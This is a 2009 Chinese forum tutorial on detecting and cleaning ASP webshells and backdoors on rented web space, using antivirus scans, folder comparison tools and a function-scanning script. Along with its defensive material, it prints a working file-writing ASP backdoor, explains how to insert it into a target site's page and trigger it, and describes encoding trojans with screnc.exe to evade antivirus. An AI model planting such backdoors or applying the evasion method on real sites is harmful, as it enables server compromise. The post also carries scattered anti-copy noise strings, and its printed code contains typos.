下沙论坛

 找回密码
 注册论坛(EC通行证)

QQ登录

QQ登录

下沙大学生网QQ群8(千人群)
群号:6490324 ,验证:下沙大学生网。
用手机发布本地信息严禁群发,各种宣传贴请发表在下沙信息版块有问必答,欢迎提问 提升会员等级,助你宣传
新会员必读 大学生的论坛下沙新生必读下沙币获得方法及使用
查看: 2482|回复: 1
打印 上一主题 下一主题

asp后门、asp木马大清理

[复制链接]
  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    跳转到指定楼层
    1
    发表于 2009-4-17 08:32:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
    网上的一些防范asp木马的教程都基于提前防范的基础之上,例如:禁止FSO,利用NTFS限制用户目录等等。这些方法虽然有效,但是都是基于提前防范的,而且对于一般的买空间来做网站的朋友来说显然不可能。我在这里讲讲如何有效的发现web空间中的asp木马并清除。
    1 z: y1 l. k& d- V# H$ `7 I
    ; e6 s2 ?- X$ K4 x+ s/ x8 A5 `  {通过帮朋友整理web空间摸索出了一些技巧,这些技巧还挺管用,不敢独享,拿出来共享。
    7 x8 `" h# n3 o# q& B$ L
    , m; J) Y2 Y$ P+ q8 a( e一.技巧1:杀毒软件查杀
    ; i4 Q0 p- M) j9 \4 e3 x8 s
    " @0 N2 w$ h/ R6 P% l* y2 w) f一些朋友可能在成功得到上传权限之后,上传的asp木马是一些非常有名的asp木马,例如:cmdasp,海洋顶端木马,这些木马虽然功能强大,但是早已经被杀毒软件列入了黑名单,所以利用杀毒软件对web空间中的文件进行扫描,可以有效的发现并清除这些有名的asp木马。这是我利用瑞星杀毒软件在web目录中查杀到的一个asp木马,木马标注为:Script.ASP.Rootkit.10.a,在瑞星的网站上搜索一下,可以知道这就是海洋顶端木马。 ! G0 U: J; n3 T5 r5 G& q5 W
    # N( Y+ |" ~( x' s$ j
    利用这种方法,可以有效的对抗一些小菜上传的asp木马,效果明显。 0 o1 [  b; x1 F2 P. l5 \/ k
    : j0 ]" z8 Z7 t  c0 g3 v
    二.技巧2:FTP客户端对比 * y# F4 J6 k5 `! T9 c6 R. t

    3 N4 L5 Q$ q7 r0 F4 t1 B; X上面的方法虽然对菜鸟入侵者比较管用,但是遇到稍微有点意识的入侵者来说,几乎失去效果,因为他们完全可以对asp木马进行伪装,加密,使其躲藏杀毒软件,这样的手法比较多,我个人比较喜欢微软开发个的一个asp加密小工具:screnc.exe,screnc.exe是一款ASP加密程序,加密的程式比较安全,使代码完全改变,使用也非常简单。只需要在命令下输入:
    # s# P' |4 l: S& @9 y
    - H7 w! t) S( X8 T- Pscrenc.exe,得到帮助命令:Usage: screnc [/?] [/f] [/xl] [/l ScriptLanguage] [/e DefaultExtension] 〈source〉 〈destination〉,根据提示,只需要输入:screnc.exe 要加密的asp木马名 输出的asp木马名,就可以完成加密伪装。
    ' g0 n" t' u- B. s, K4 e! u6 L0 N; z* c! p( \0 p0 J! |
    经过加密之后,记事本打开查看,可以看到标签:〈% ……%〉,〈script〉〈/script〉 9 p/ a) r5 v. x

    - {; F0 x2 v2 ?+ H" y& H9 s- I等标签内的代码成为一些“乱码”,而杀毒软件查杀asp木马是通过搜索关键字来查杀,着阿姨能够显然就躲过查杀。
    " O/ i" b: W9 B. n4 y$ ^" d4 H$ a. [' @. p( l; c$ l
    盛大官方网站被黑,挂的网页木马代码就是利用screnc.exe来加密的,过了好几天才被发现,可见加密伪装手法的高超。
    . c4 B7 B6 N- a  F( p  h8 d
    + d2 ^7 d, d: S8 t所以要采取另外的措施对付这种加密伪装的asp木马,我们可以利用一些FTP客户端软件(例如cuteftp,FlashFXP)提供的文件对比功能,通过对比FTP的中的web文件和本地的备份文件,发现是否错出可疑文件。 9 [. c4 E3 n7 I! Q1 t  }- h
    0 I4 u- b/ m7 R0 O! E* @
    这里以FlashFXP进行操作讲解。
    ) n! g, }% {7 ~2 e6 O; u0 r/ l0 s. ]  U
    步骤1:打开FlashFXP,在左边窗口中跳转到本地web备份文件目录,在右边的FTP窗口中跳转到web目录下。 : k" H, H" k) g

    + t! |4 q5 P9 C  e$ {2 R步骤2:点工具栏中的“工具”,选择其中的“比较文件夹命令”,即可进行对比文件夹,速度非常快。 0 P  X! [. v) M

    ! N2 a$ ~, \$ M- z我们可以清楚的看到196个对象被过滤,在FTP空间中多出了这样几个asp文件:.asp,2005.asp等,这十有八九就是入侵者留下的asp后门,打开确认一下即可。 / f* y  x4 B- S3 w& I2 `$ M
    三.技巧3:用Beyond Compare 2进行对比
    ' Q% v6 r! V8 G: w; L$ v7 _6 M9 R; P  n' w9 G! D  @& Y6 l
    上面的利用FTP客户端对比文件的方法,虽然有效,但是遇到渗透入文件的asp木马,那就无能为力了,这里介绍一款渗透性asp木马,可以将代码插入到指定web文件中,平常情况下不会显示,只有使用触发语句才能打开asp木马,其隐蔽性非常高。代码如下: 8 @% s  O& g4 o' `

    5 l) W; A- o& a. u〈% 4 V+ J2 {, ]! |) \* T; Q4 t- w% N

    : S3 C* s2 p! X7 C& r3 F. b* mon error resume next + K! V' A2 w* j1 j4 R
    ! H: c& f8 g. y+ i6 D8 J
    id=request("id")
      }3 A" I( E; V: m! R+ t/ G
    3 J  j, }0 }" y" l! hif request("id")=1 then ; O' T) I' w2 V. l3 H

    9 ~& z3 T2 a+ [; u3 H$ V3 V& M# j" v) Otestfile=Request.form("name")
    2 ~4 `1 @; g  r6 I" f# W6 k" D' F: r( x# D/ R
    msg=Request.form("message")
      C3 ^+ p/ C+ d- b  p9 X, L- m0 ?6 @) O' @5 Y
    set fs=server.CreatObject("scripting.filesystemobject")
    ( O% M# ?; s( |% U# \$ N* @& X: V
    - m7 }( e3 U& `set thisfile=fs.openTestFile(testfile,8,True,0) ! r. g0 u: [; i5 w! L6 E
    & J) ]; w3 |9 P$ Z' X5 Q/ ]
    thisfile.Writeline(""&msg&"")
    ) q2 [6 u' {. I  m
    4 R( [5 e; o# L$ m- f7 u; i% L+ xthisfile.close 9 v; c/ G2 E' D4 C& p! T  m" o

    $ e, \8 g, K$ aset fs=nothing
    + }8 T* e. h: U6 F' I; `( X
    5 y9 j; r1 N5 X* Z7 q%〉
    ( |* S4 i3 X( A7 L9 o, j
    3 j* i, a( Y) S/ _2 e〈from method="post" Action="保存"?id=1〉 $ r, A% Y6 V7 O& E/ d, e" M
    9 f5 \" ], n( ?. A
    〈input type="text" size="20" name="Name"
    " o; V3 X2 o- y8 }+ J7 N1 ?; k) c1 N9 \" `( |( y$ \
    Value=〈%=server.mappath("XP.ASP")%〉〉 1 L& x/ ?7 m1 W6 M
    8 m3 I  J$ B/ Y) G& t
    〈textarea name="Message" class=input〉
    # V, n6 t/ N, S5 E" V/ `! U/ ?2 F" w. @( m. o# j& k
    2 e# x6 h9 [' k- U( ~( J& A2 T
    〈/textarea〉 & H9 Y+ N3 F4 m. G/ y
    : f! x9 r' i) t7 c7 r
    〈input type="Submit" name="send" Value="生成" , M- f$ a* h# A! \6 a

    & _. X2 g2 S9 R3 \class=input〉
    8 U! L  d- Q1 ~. }: t9 I; W8 x4 w4 k" V1 B, V/ Q
    〈/from〉 4 r2 F5 b6 R4 F( ?" H( o6 d
    . @: ~/ ^% C# N
    〈%end if%〉 $ [2 D9 Q* F7 p% k/ q
    4 n2 p, i* Z& ^/ |8 T7 y
    注意:在修改目标主机的web文件时,要注意这样的文件修改后没有效果,即含有类似于:〈!--#include file="inc/conn.asp"--〉这样的文件包含命令,这样的代码存在时,加入asp代码后根本不会显示出脚本后门,但是脚本后门代码不会影响原文件的显示和功能。
    + j2 Y) r/ H5 q  I  e" z* i0 q" N! [, B9 U
    假如已经对目标服务器www.target.com下的一个editor_InsertPic.asp文件进行了修改,插入了脚本后门代码,那么打开的方式是:www. target..com/editor_InsertPic.asp?id=1,注意后门的字符?id=1,有了这些字符,才能保证脚本后门显示出来!普通情况下打开www. target..com/editor_InsertPic.asp?id=1,是不会露出破绽的。
    0 k5 N$ C+ C+ ~- V
    7 K( B8 f* n2 z$ D, U* i/ f这招真是asp木马放置中非常狠的,如果遇到这样的情况,该怎么办?我们可以利用一款专业的文件对比工具Beyond Compare 2来完成木马的查找。
    * Z1 o% n' u9 h4 |! U1 E' c$ [: p
    Beyond Compare 2一款不可多得的专业级的文件夹和文件对比工具。使用它可以很方便的对比出两个文件夹或者文件的不同之处。并把相差的每一个字节用颜色加以表示,查看方便。并且支持多种规则对比。

    3 O; g+ F4 n& R/ O. G' t. }! ?, c! ?/ n! b& _
    看我来利用它完成渗透性asp木马的查找。
    4 r5 ^1 E- [2 k$ y/ p! I7 C. H7 R
    ! C! Q  l7 T" ]$ T4 M% I, a0 O- B. j. G步骤1:打开Beyond Compare 2,点工具栏中的“比较任务”,选择其中的选项:新建,在“比较模式”中选择“比较两个文件夹”。进入一下步,选择需要对比的两个文件夹路径,即备份过的网站文件以及从FTP上下载的网站文件,再在下面的“文件过滤器”中选择“包括所有文件”。在“比较范围”中选择“文件大小”。设置完毕即可开始比较。 " O& K! S" e! S4 v& i

    6 P& l; q- ]+ W" J4 l步骤2:比较完毕,软件界面左右两边分别显示了比较的结果,从中可以很容易找到哪个目录多出了什么文件。
    # O" C: K4 `  \& R( f' g3 Q- @! k+ P$ u8 B2 N+ m
    步骤3:文件名相同,但是大小不同的文件,会被软件用另外的颜色标注出来,选择上它们,然后选择工具栏的“操作”中的“比较内容”功能,即可展开两个文件的详细内容,从中我们可以看到FTP端的文件被插入了渗透asp木马。这下很容易找到了吧! ( @1 l5 S' l& ]8 ]. k+ n. m" [

    ' s9 y$ J3 h  T% x2 m; B' X
    6 N$ Z3 c$ s: A四.技巧4:利用组件性能找asp木马
    % |/ r( c% ^8 ^5 ?; w% V& L9 X$ u) j( F
    上面分门别类的介绍了几种asp木马的放置与查杀技巧,一般的菜鸟,老鸟恐怕都是利用上面的方法来放置asp木马吧!所以可以有效的对抗web空间中上传的asp木马。这下可以高枕无忧了吧?呵呵!先别急,还有一种BT的asp木马放置方法,你可能很难想到,放置思路是这样的:在目标web空间中寻找一个不常用的,比较合适的asp文件,打开它对其进行代码精简,然后再将渗透asp木马的代码插入,再对其进行精简,直至与原本的文件大小一样。最后利用加密伪装的手法对其进行处理。这样就彻底练就了一个绝对隐藏的asp木马后门,一般的入侵者恐怕很难做到这一点,因为要精简代码的同时还要保证asp木马的功能不会错误。
    2 }. z2 u" P8 C: r( L( J
    8 J: b( ]% f! i" f如果你恰恰遇到一个这样的入侵者,那么该怎么才能查出被他放置的asp木马呢?你可能认为这已经不太可能了,呵呵!完全可能,看我拿出宝贝来:思易asp木马追捕。 4 A* {( l8 x" ]5 t& |

    % J; |; b& [5 ^它是一款专门检索各种asp文件所带功能的asp软件,通过搜索asp木马含有的特殊字符,以及搜索利用变量创建对象及静态对象建立的代码,来找出可能含有疑点的asp文件,从而有效的防范asp木马。 . k. K1 |) o" B! F# u- a$ Y; K: v2 J
    : d+ E3 c- R& Y9 V/ ?
    使用非常简单,只需要将文件asplist2.0.asp上传到web空间下,然后在地址拦中打开,就完成了所有asp文件的检索。可以看出它是通过查找各个asp文件的功能来确认是否为asp木马,这些功能也都是asp木马常用的:FSO,WS,SHELL,XML等等。 4 C+ ^/ ~* O: O
    % C3 t: f- Q- \" R* v
    一般的web文件很少具有这样的功能,只有那些可恶的asp木马才具有,可以看到一些文件具备了相当多的功能,这时候,就可以打开这些文件来确认是否是asp木马,非常有效。 ! q8 T' W% v  o& K
    # ?, M6 Q  I8 N
    大家在查找web空间的asp木马时,最好几种方法结合起来,这样就能有效的查杀被隐藏起来的asp木马。
    分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
    收藏收藏 分享分享 顶 踩
  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    2
     楼主| 发表于 2009-4-17 13:22:05 | 只看该作者
    回复 支持 反对

    使用道具 举报

    本版积分规则

    关闭

    下沙大学生网推荐上一条 /1 下一条

    快速回复 返回顶部 返回列表